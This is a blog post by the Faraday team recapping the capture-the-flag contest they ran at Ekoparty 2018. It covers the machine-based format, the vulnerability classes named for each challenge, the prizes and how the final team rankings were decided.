Faraday CTF at Ekoparty 2018


Another year, another ekoparty passed, where we launched a new CTF with some changes with respect to last year's version (have you read it?).

This time, we decided to leave behind the Jeopardy style and change to another one, similar to 'HackTheBox', with real machines containing the challenges.

These machines contain the different flags in a '.txt' format:

 - The first flag, which belongs to a normal OS user.
 - The second flag, which belongs to the root OS user.

Obviously, the challenges varied with respect to their difficulty, starting from regular web application challenges, to reversing, exploiting and crypto.

The prizes
This time, we were giving out these prizes:

 1 - Nintendo Switch
 2 - Portable TP-Link router and an Arduino with a Wi-Fi module.
 3 - An Arduino with a Wi-Fi module and a T-shirt.

The challenges
We started playing some CTFs this past years and found that the Jeopardy style is not our favorite, so we decided to change it for our CTF. We tried to innovate with something different, implementing a scenario very similar to a pentest, where the objectives were clear:

  •  Every challenge will be based on a real world vulnerability.
  •  We will deploy different challenges, where users could demonstrate all their skills on web applications, OS security, reversing and crypto.
  •  As a way to demonstrate their knowledge and technique to solve each challenge, the users must send us a writeup.
  • Something really important to keep in mind, is that the challenges are unique machines, all users who are participating must erase all trace in order to not facilitate their solution to other people.

The following list shows the name of each machine, with the different challenges on them:

ChallengeSeverityUser VulnerabilityRoot Vulnerability
PICHONAITOREASYFirewall Bypass + File UploadSudo without password
POLAKEASYSerialization + Command InjectionProcess hijacking
EZEMEDIUMFile Disclosure + SSRF Buffer Overflow
MARTAMEDIUMPadding Oracle + LFILinux Wildcard Injection
FRUTISHITAHARDRace Condition + File UploadServer Side Template Injection
SSSHARDBrainfuckBuffer Overflow + Crypto

Teams
This year we had many more teams playing than last year: 45 teams were registered, of which 15 were active.

The first positions were:
- SecSignal
- FzFz
- 3xG

Although, for reasons beyond our control, the following happened:

The FzFz team notified that they could not collect the prize, so they left their position to the next competitor.
Amnesia team, placed 4th (and because of that last fact, now 3rd) did not send us the writeup, so they lost their position and RLTEAM (who was 5th) was now the 3rd (they sent the writeup).

So, with this changes, the winners were:
- SecSignal
- 3xG
- RLTEAM

Finally, we want to thank user 'L' who found a bug on our platform and decided to report it without taking advantage of it. We grant him within the CTF, a mention and an extra flag for his attitude.

We are very happy with the CTF we did this year, and want to thank all those who came with questions, played it and/or helped us with the organization. We hope you enjoyed it, as much or more as we did!

We are coming back next year!
Are you?

Faraday Team

https://www.faradaysec.com
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas
https://github.com/infobyte/faraday
https://twitter.com/faradaysec



Post a Comment
Thanks for your comment